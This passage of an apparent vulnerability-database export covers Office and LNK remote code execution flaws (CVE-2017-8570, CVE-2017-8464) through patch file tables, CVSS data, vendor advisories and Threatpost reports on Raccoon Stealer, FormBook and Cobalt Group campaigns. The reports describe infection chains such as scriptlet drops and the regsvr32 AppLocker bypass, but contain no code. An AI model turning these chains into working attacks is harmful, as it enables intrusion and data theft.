332D2E32A6A7F7B3F6E4CBFBBF54ABE001120D67| 010C72A9BE5596DF34C1219E08245CAE471C6887EC3BD45F2FC5358B5395EF8C \nmsodll302016-kb3213545-fullfile-x64-glb.exe| 8F0138EABC7D356898006268F4CC0D6E030C7D11| 33C282E24CA8E76F4366E2F3CD2262F38ADC84C807E505C9BB1D8FDC715C27DA \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. \nFor all supported x86-based versions of Office 2016| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmsointl30.dll.x86.2074| msointl30.dll| 16.0.4309.1000| 60608| 27-Jun-17| 05:47 \nmsointl30.dll.x86.1054| msointl30.dll| 16.0.4483.1000| 80632| 27-Jun-17| 05:47 \nmso30win32client.dll| mso30win32client.dll| 16.0.4561.1002| 4767488| | \nmso30win32client.dll.x64| mso30win32client.dll| 16.0.4561.1002| 4767488| 27-Jun-17| 05:15 \nmsointl30.dll.x86.1033| msointl30.dll| 16.0.4309.1000| 59584| 26-Jun-17| 09:52 \nmso30win32client.dll.x86| mso30win32client.dll| 16.0.4561.1002| 3199232| 27-Jun-17| 05:16 \nFor all supported x64-based versions of Office 2016File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nconversion.msoserver.msointl30_win32.dll_2074| msointl30_win32.dll| 16.0.4309.1000| 60608| | \nmsointl30.dll.x64.2074| msointl30.dll| 16.0.4309.1000| 60608| 27-Jun-17| 05:42 \nconversion.msoserver.msointl30_win32.dll_1054| msointl30_win32.dll| 16.0.4483.1000| 80640| 27-Jun-17| 05:42 \nmsointl30.dll.x64.1054| msointl30.dll| 16.0.4483.1000| 80640| 27-Jun-17| 05:42 \nmsointl30.dll.x86.2074| msointl30.dll| 16.0.4309.1000| 60608| 27-Jun-17| 05:47 \nmsointl30.dll.x86.1054| msointl30.dll| 16.0.4483.1000| 80632| 27-Jun-17| 05:47 \nconversion.msoserver.msointl30_win32.dll_1033| msointl30_win32.dll| 16.0.4309.1000| 59584| | \nmsointl30.dll.x64.1033| msointl30.dll| 16.0.4309.1000| 59584| 26-Jun-17| 09:52 \nmso30win32client.dll| mso30win32client.dll| 16.0.4561.1002| 4767488| | \nmso30win32client.dll.x64| mso30win32client.dll| 16.0.4561.1002| 4767488| 27-Jun-17| 05:15 \nmsointl30.dll.x86.1033| msointl30.dll| 16.0.4309.1000| 59584| 26-Jun-17| 09:52 \nmso30win32client.dll.x86| mso30win32client.dll| 16.0.4561.1002| 3199232| 27-Jun-17| 05:16 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2016: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213545", "href": "https://support.microsoft.com/en-us/help/3213545", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-21T18:44:22", "description": "A remote code execution vulnerability exists in Microsoft Office. This vulnerability is due to incorrect handling of embedded OLE objects in Office documents. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-29T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office Composite Moniker Code Execution (CVE-2017-8570)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2022-11-21T00:00:00", "id": "CPAI-2017-0725", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-14T18:41:18", "description": "A vulnerability has been found in the way Windows Explorer handles LNK files. An attacker exploiting this vulnerability could achieve Remote Code Execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft LNK Remote Code Execution (CVE-2017-8464; CVE-2018-0978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2018-0978"], "modified": "2022-11-14T00:00:00", "id": "CPAI-2017-0477", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-03-17T02:35:24", "description": "A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on user with the same permissions as the current user.\n\nTo exploit the vulnerability, a user must open a specially crafted file with an affected version of Microsoft Office software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office handles files in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mscve", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "MS:CVE-2017-8570", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:35:24", "description": "A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.\n\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThe attacker could present to the user a removable drive, or remote share, that contains a malicious .LNK file and an associated malicious binary. When the user opens this drive(or remote share) in Windows Explorer, or any other application that parses the .LNK file, the malicious binary will execute code of the attacker\u2019s choice, on the target system.\n\nThe security update addresses the vulnerability by correcting the processing of shortcut LNK references.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "LNK Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8464", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-09T11:33:23", "description": "Criminals behind malware dubbed Raccoon Stealer have adopted a simple and effective technique to circumvent Microsoft and Symantec anti-spam messaging gateways. The technique has been used in a recent campaign targeting financial institutions via business email compromise (BEC) attacks.\n\nAccording to a [Cofense report posted Thursday](<https://cofense.com/raccoon-stealer-found-rummaging-past-symantec-microsoft-gateways/>), the malware is delivered inside an .IMG file hosted on a hacker-controlled Dropbox account.\n\n\u201cUsing the familiar theme of a wire transfer\u2014closely akin to those often seen in business email compromise scams\u2014the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file,\u201d wrote Cofense authors Max Gannon and Alan Rainer. \n[](<https://threatpost.com/newsletter-sign/>) \nWhat makes the Raccoon Stealer interesting to researchers is that it is new, easy-to-use and under active development by the hackers behind it. Cofense said the malware was first spotted in April of 2019 and since then has been leveraged in several different campaigns.\n\nThe malware is sold on underground forums in both Russian and English and includes around-the-clock customer support, Cofense said.\n\nAccording to research published in October by Cybereason, the malware has infected hundreds of thousands of Windows systems since April. Researchers there said developers behind the Raccoon Stealer charge $200 months for it use.\n\n\u201cIn this most recent campaign, a potentially compromised email account was used to send the email,\u201d researchers at Cofense wrote. Those messages managed to make it past Symantec Email Security and Microsoft EOP gateways \u201cwithout the URL being removed or tampered with to the extent that it would prevent victims from clicking on it and downloading the payload.\u201d\n\nBecause of the malware\u2019s flexibility to deliver a variety of payloads the Raccoon Stealer is gaining traction in underground markets, said researchers.\n\n**Tricky Raccoons**\n\nIn previous campaigns, Cofense researchers said the Raccoon Stealer malware has hid inside RFT document attachments and targeted the utilities sector. In those campaigns, adversaries behind the attacks attempted to leverage a known Microsoft Office remote code execution vulnerability ([CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>)) that dates back to 2017.\n\n\u201cAlthough not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads,\u201d researchers wrote.\n\nThe Raccoon Stealer malware has also been leveraged by attackers behind the Fallout exploit kit. [Over the summer](<https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf>), researchers at Bitdefender observed malicious online ads being used to deliver Raccoon Stealer to vulnerable systems. Exfiltrated from those endpoints were login credentials, auto-fill information and cookies from the Google Chrome and Mozilla browsers. Also stolen were credential for various crypto wallets.\n\n\u201cGiven the variety of delivery options, Raccoon Stealer could be a problem for organizations that focus too much on one infection vector,\u201d Cofense researchers said.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "cvss3": {}, "published": "2019-11-22T13:32:10", "type": "threatpost", "title": "Raccoon Stealer Malware Scurries Past Microsoft Messaging Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2019-11-22T13:32:10", "id": "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "href": "https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:17", "description": "A new wave of document attacks targeting inboxes do not require enabling macros in order for adversaries to trigger an infection chain that ultimately delivers FormBook malware.\n\nResearchers at Menlo Security are reporting a wave of attacks that began last month that are targeting financial and information service sectors in the Middle East and United States. The method of infection includes a new multi-stage infection technique.\n\nThe company, which released details of the method Monday, said that attacks are adept at evading security solutions such as sandboxes and AV solutions, which fail when there is no malicious content or rogue links in a document to detect.\n\n\u201cThe absence of active code or shellcode in the first stage malicious document, which was sent as an email attachment, is noteworthy because this attack relies on a remotely-hosted malicious object,\u201d said Vinay Pidathala, director of security research at Menlo Security.\n\nResearchers said attackers are exploiting \u201cdesign flaws\u201d in the document formats .docx and RTF, in combination with abusing unpatched instances of a remote code execution vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>) [\u2013 patched in July 2017](<https://threatpost.com/microsoft-patch-tuesday-update-fixes-19-critical-vulnerabilities/126758/>).\n\nThe first stage of the attack is the most significant and unique aspect of the malware infection chain, according to researchers. It involves a spam email and an attached .docx file. The Word document utilizes Framesets. \u201cFramesets are HTML tags and contain frames responsible for loading documents,\u201d described the researcher.\n\nWhen the document is simply viewed in Microsoft Office \u201cEdit\u201d mode (and not the default \u201cProtected\u201d mode), an embedded frame points to a TinyURL defined in the document\u2019s webSettings.xml.rels file. A \u201c.rels\u201d file contains information about how different parts of a Microsoft Office document fit together, according to a [description on File.org](<https://file.org/extension/rels>).\n\n\u201cIf a victim opens the malicious first stage document, Microsoft Word makes an HTTP request to download the object pointed to by the URL and renders it within the document,\u201d according to Menlo Security.\n\nIn the case of the rogue document, the TinyURL points to command-and-control (C2) server domains located in France and the United States that download a malicious RTF file.\n\nAccording to Pidathala, it is this first stage of the attack that is unique. The rest of the attack, he said, is fairly common and one currently used in a number of recent attacks by cybercriminals behind the Cobalt group to deliver FormBook and other types of malware.\n\n\u201cA design behavior occurs in RTF documents, when an RTF document with an embedded Package object is opened, the embedded object is automatically dropped to the %TEMP% directory of Windows. This technique was also used by the threat actors behind the Cobalt group that used [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>),\u201d wrote researchers noting a recent spike in attacks [using the CVE](<https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware>).\n\nThe vulnerability CVE-2017-11882 is the remote code execution bug patched last November located in an Office executable called Microsoft Equation Editor. But instead of taking advantage of that vulnerability, the most recent attacks identified by Menlo Security take advantage of the vulnerability [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>).\n\nThe vulnerability CVE-2017-8570 is a remote code execution vulnerability in Microsoft Office tied to the way the software suite handles objects in memory.\n\n\u201cFor the attack to succeed, this executable still needs to be executed. And, that\u2019s where the CVE-2017-8570 comes into play. CVE-2017-8570 executes the dropped object in the %TEMP% directory,\u201d researchers said.\n\nMenlo Security observed an embedded .sct (scriptlet) file dropped to the %TEMP% directory. \u201cWhen the .sct file is executed, the large amount of data is written to the %TEMP% directory with the name chris101.exe. Wscript.Shell.Run() method is then called with the path to the .exe to start the malicious executable,\u201d they said.\n\nNext, the malicious executable calls to the adversaries\u2019 C2 and downloads a third-stage downloader that drops the FormBook malware onto the targeted system.\n\nFormBook is a type of data-stealing malware used in espionage and is capable of keystroke logging, stealing clipboard contents and extracting data from HTTP sessions. Once installed, the malware can also execute commands from a command-and-control (C2) server such as instructing the malware to download more files, start processes, shutdown and reboot a system and steal cookies and local passwords.\n\nPidathala said he believes this attack technique exposes a larger attack surface. \u201cThere will be an uptick in malicious objects, where the malicious components are remotely hosted,\u201d he said.\n", "cvss3": {}, "published": "2018-04-09T18:35:39", "type": "threatpost", "title": "Word Attachment Delivers FormBook Malware, No Macros Required", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570"], "modified": "2018-04-09T18:35:39", "id": "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "href": "https://threatpost.com/word-attachment-delivers-formbook-malware-no-macros-required/131075/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:32", "description": "Microsoft\u2019s Patch Tuesday update today included a massive 95 fixes that tackle vulnerabilities in Windows, Office, Skype, Internet Explorer and its Edge browser. Twenty-seven of Microsoft\u2019s patches fix remote code execution issues, allowing attackers to remotely take control of a victim\u2019s PC. Eighteen patches are rated critical by Microsoft, 76 important and one is rated moderate.\n\nOf greatest concern are two vulnerabilities currently under attack that include a Windows Search Remote Code Execution Vulnerability ([CVE-2017-8543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8543>)) and a LNK Remote Code Execution Vulnerability ([CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>)).\n\nThe more serious of the two, the Windows Search Remote Code Execution Vulnerability patch, tackles a RCE in the Windows OS found the Windows Search Service (WSS), a feature in Windows that allows users to search across multiple Windows services and clients.\n\n\u201cIn an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer,\u201d according to the bulletin. Affected are Windows Server 2016, 2012, 2008 as well as desktop systems like Windows 10, 7 and 8.1.\n\nThe second vulnerability actively being exploited is the LNK Remote Code Execution Vulnerability, that allows a RCE if a specially crafted shortcut is displayed to a user. \u201cIf you\u2019re experiencing d\u00e9j\u00e0 vu reading the bug title, it\u2019s certainly understandable. This type of vulnerability was used by the Stuxnet malware, then found again several years later through a ZDI program submission,\u201d according to Patch Tuesday commentary by Zero Day Initiative 